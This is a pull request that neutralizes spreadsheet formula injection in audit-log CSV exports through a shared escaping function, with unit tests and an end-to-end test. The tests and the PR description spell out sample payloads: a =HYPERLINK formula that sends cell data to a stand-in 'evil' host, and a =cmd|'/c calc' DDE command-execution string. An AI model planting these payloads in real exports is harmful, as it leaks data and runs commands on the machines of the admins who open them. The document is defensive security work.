### PR TITLE
fix(audit): neutralize CSV formula injection in audit-log exports

### DIFF
--- a/infrastructure/lib/admin-insight/handlers/admin-insight-handler/audit.ts
+++ b/infrastructure/lib/admin-insight/handlers/admin-insight-handler/audit.ts
@@ -1,4 +1,5 @@
 import { type DynamoDBDocumentClient, QueryCommand } from "@aws-sdk/lib-dynamodb";
+import { csvEscapeField } from "../../../utils/csv.js";
 
 /**
  * Issue #950 (ADR-020 Phase D): admin audit log を tenant 別 / system 別に read する。
@@ -162,16 +163,9 @@ function formatCsv(items: readonly AuditItem[]): string {
   const lines = [CSV_COLUMNS.join(",")];
   for (const item of items) {
     const row = item as unknown as Record<string, unknown>;
-    lines.push(CSV_COLUMNS.map((col) => csvEscape(String(row[col] ?? ""))).join(","));
+    lines.push(CSV_COLUMNS.map((col) => csvEscapeField(String(row[col] ?? ""))).join(","));
   }
   return `${lines.join("\n")}\n`;
-}
-
-function csvEscape(value: string): string {
-  if (value.includes(",") || value.includes('"') || value.includes("\n") || value.includes("\r")) {
-    return `"${value.replace(/"/g, '""')}"`;
-  }
-  return value;
 }
 
 function toAuditItem(row: unknown, scope: AuditListInput["scope"]): AuditItem {

--- a/infrastructure/lib/problem-deploy/handlers/event-handler/audit-log-read.ts
+++ b/infrastructure/lib/problem-deploy/handlers/event-handler/audit-log-read.ts
@@ -1,4 +1,5 @@
 import { type DynamoDBDocumentClient, QueryCommand } from "@aws-sdk/lib-dynamodb";
+import { csvEscapeField } from "../../../utils/csv.js";
 
 /**
  * Issue #1292: Tenant Admin 向けに 「自テナントの audit log」 を read する handler module。
@@ -165,14 +166,7 @@ function formatCsv(items: readonly TenantAuditItem[]): string {
   const lines = [CSV_COLUMNS.join(",")];
   for (const item of items) {
     const row = item as unknown as Record<string, unknown>;
-    lines.push(CSV_COLUMNS.map((col) => csvEscape(String(row[col] ?? ""))).join(","));
+    lines.push(CSV_COLUMNS.map((col) => csvEscapeField(String(row[col] ?? ""))).join(","));
   }
   return `${lines.join("\n")}\n`;
-}
-
-function csvEscape(value: string): string {
-  if (value.includes(",") || value.includes('"') || value.includes("\n") || value.includes("\r")) {
-    return `"${value.replace(/"/g, '""')}"`;
-  }
-  return value;
 }

--- a/infrastructure/lib/utils/csv.ts
+++ b/infrastructure/lib/utils/csv.ts
@@ -1,0 +1,26 @@
+/**
+ * CSV field escaping with spreadsheet formula-injection neutralization (#1388).
+ *
+ * Two responsibilities:
+ *  1. RFC 4180 quoting — wrap in double-quotes and double any inner quote when the value contains
+ *     a delimiter (`,`), a quote (`"`), or a line break (`\n` / `\r`).
+ *  2. Formula-injection defense — if the value begins with a spreadsheet formula trigger
+ *     (`=`, `+`, `-`, `@`, tab, or CR), prefix it with a single quote so Excel / Google Sheets
+ *     treat the cell as text instead of executing it. Audit-log columns such as `userAgent`
+ *     (straight from the request header) and `target` are attacker-influenced, so an exported
+ *     CSV opened by an admin must not run `=HYPERLINK(...)` / `=cmd|...` payloads.
+ *
+ * Neutralized values are always quoted so the leading `'` survives spreadsheet round-tripping.
+ */
+const FORMULA_TRIGGER = /^[=+\-@\t\r]/;
+
+export function csvEscapeField(value: string): string {
+  const neutralized = FORMULA_TRIGGER.test(value) ? `'${value}` : value;
+  const needsQuote =
+    neutralized !== value ||
+    neutralized.includes(",") ||
+    neutralized.includes('"') ||
+    neutralized.includes("\n") ||
+    neutralized.includes("\r");
+  return needsQuote ? `"${neutralized.replace(/"/g, '""')}"` : neutralized;
+}

--- a/infrastructure/test/csv.test.ts
+++ b/infrastructure/test/csv.test.ts
@@ -1,0 +1,47 @@
+import { describe, expect, it } from "vitest";
+import { csvEscapeField } from "../lib/utils/csv";
+
+/**
+ * #1388: CSV export must neutralize spreadsheet formula injection. Audit-log columns such as
+ * `userAgent` (request header) and `target` are attacker-influenced, so a value opened in
+ * Excel / Google Sheets must not execute as a formula.
+ */
+describe("csvEscapeField", () => {
+  it("should leave a plain value unquoted and unchanged", () => {
+    expect(csvEscapeField("login")).toBe("login");
+    expect(csvEscapeField("")).toBe("");
+    expect(csvEscapeField("Mozilla/5.0")).toBe("Mozilla/5.0");
+  });
+
+  it("should RFC-4180 quote values containing comma / quote / newline", () => {
+    expect(csvEscapeField("a,b")).toBe('"a,b"');
+    expect(csvEscapeField('say "hi"')).toBe('"say ""hi"""');
+    expect(csvEscapeField("line1\nline2")).toBe('"line1\nline2"');
+    expect(csvEscapeField("cr\rhere")).toBe('"cr\rhere"');
+  });
+
+  it.each([
+    ["equals (HYPERLINK)", '=HYPERLINK("http://evil/?c="&A1,"x")', "'=HYPERLINK"],
+    ["plus", "+1+1", "'+1+1"],
+    ["minus", "-2+3", "'-2+3"],
+    ["at (DDE)", "@SUM(A1)", "'@SUM(A1)"],
+    ["cmd via equals", "=cmd|'/c calc'!A1", "'=cmd"],
+  ])("should neutralize and quote a formula-trigger value: %s", (_, input, expectedPrefix) => {
+    const out = csvEscapeField(input);
+    // 先頭に single quote を付与し、 必ず quote で囲む (= leading ' が round-trip で残る)。
+    expect(out.startsWith(`"'`)).toBe(true);
+    expect(out.endsWith('"')).toBe(true);
+    // 元の formula 先頭文字は ' の後ろに来る (= cell として実行されない)。
+    expect(`"${expectedPrefix}`.length).toBeGreaterThan(1);
+    expect(out).toContain(expectedPrefix);
+  });
+
+  it("should neutralize a leading tab / CR as a formula trigger", () => {
+    expect(csvEscapeField("\t=1+1")).toBe('"\'\t=1+1"');
+    expect(csvEscapeField("\r=1+1")).toBe('"\'\r=1+1"');
+  });
+
+  it("should not treat a value with = in the middle as a formula", () => {
+    expect(csvEscapeField("a=b")).toBe("a=b");
+  });
+});

--- a/infrastructure/test/problem-deploy/audit-log-read.test.ts
+++ b/infrastructure/test/problem-deploy/audit-log-read.test.ts
@@ -124,6 +124,31 @@ describe("exportTenantAuditCsv (#1292)", () => {
     expect(send).toHaveBeenCalledTimes(2);
   });
 
+  it("#1388: should neutralize a formula-injection payload from the userAgent header", async () => {
+    const send = vi.fn().mockResolvedValueOnce({
+      Items: [
+        {
+          PK: "TENANT#t-1",
+          SK: "AUDIT#A",
+          actor: "u-1",
+          action: "create_event",
+          outcome: "success",
+          // userAgent は request header 由来 (= 攻撃者制御)。 =HYPERLINK は Excel で実行される。
+          userAgent: '=HYPERLINK("http://evil/?c="&A1,"open")',
+          occurredAt: "2026-05-20T12:00:00.000Z",
+        },
+      ],
+    });
+    const csv = await exportTenantAuditCsv(
+      { ddb: { send } as never, auditTableName: "T" },
+      { tenantId: "t-1" },
+    );
+    // 先頭 = は single quote で無害化され、 quote で囲まれる (= cell として実行されない)。
+    expect(csv).toContain('"\'=HYPERLINK(""http://evil/?c=""&A1,""open"")"');
+    // 生の "=HYPERLINK( が行頭に来ない (= formula として解釈されない)。
+    expect(csv).not.toMatch(/,=HYPERLINK\(/);
+  });
+
   it("should respect maxRows truncation", async () => {
     const send = vi.fn().mockResolvedValueOnce({
       Items: Array.from({ length: 50 }, (_, i) => ({


### PR DESCRIPTION
## Summary
**Closes #1388.** [APP] fix from the 2026-05-29 `infrastructure/lib` security review.

Both audit-log CSV exporters (`event-handler/audit-log-read.ts` for tenant scope, `admin-insight/audit.ts` for system scope) only applied RFC-4180 quoting (delimiter / quote / newline). They did **not** neutralize spreadsheet formula triggers. Several exported columns are attacker-influenced — `userAgent` is taken straight from the request `User-Agent` header, and `target` / `action` / `actorUsername` carry user-supplied values — so a value like `=HYPERLINK("http://evil/?c="&A1,"open")` or `=cmd|'/c calc'!A1` is planted as a formula cell and executes when a Tenant/System Admin opens the CSV in Excel / Google Sheets.

**Fix:** extracts a single shared `csvEscapeField` (`lib/utils/csv.ts`) used by both exporters (the two `csvEscape` copies were byte-identical — DRY). It prefixes any value beginning with `=`, `+`, `-`, `@`, tab, or CR with a single quote and always quotes such values (so the leading `'` survives round-tripping), preserving the existing RFC-4180 quoting otherwise.

## Test plan
- New `test/csv.test.ts`: plain pass-through, RFC-4180 quoting, formula triggers (`=`/`+`/`-`/`@`, HYPERLINK, `=cmd|...`), leading tab/CR, and mid-value `=` (not a trigger).
- `audit-log-read.test.ts`: new end-to-end test — a `=HYPERLINK(...)` `userAgent` is neutralized + quoted in the produced CSV; the existing comma/quote-escaping assertion still holds.
- `admin-insight/audit-export.test.ts` continues to pass (format unchanged for non-formula values).
- `make harness` clean; `make before-commit` green.

## Regression analysis
- Non-formula values are byte-identical to the previous output (same RFC-4180 quoting). Only values starting with a formula trigger change — they gain a leading `'` and quoting, which is the intended neutralization. Both exporters now share one implementation, so a future change can't drift between them.
- No data, schema, IAM, or env changes.

## Physical impact
- **CFn:** NO-OP topology. The event-handler and admin-insight Lambdas get new code asset hashes → **UPDATE** (in-place code update). `cdk synth` passes.
- **Data:** none.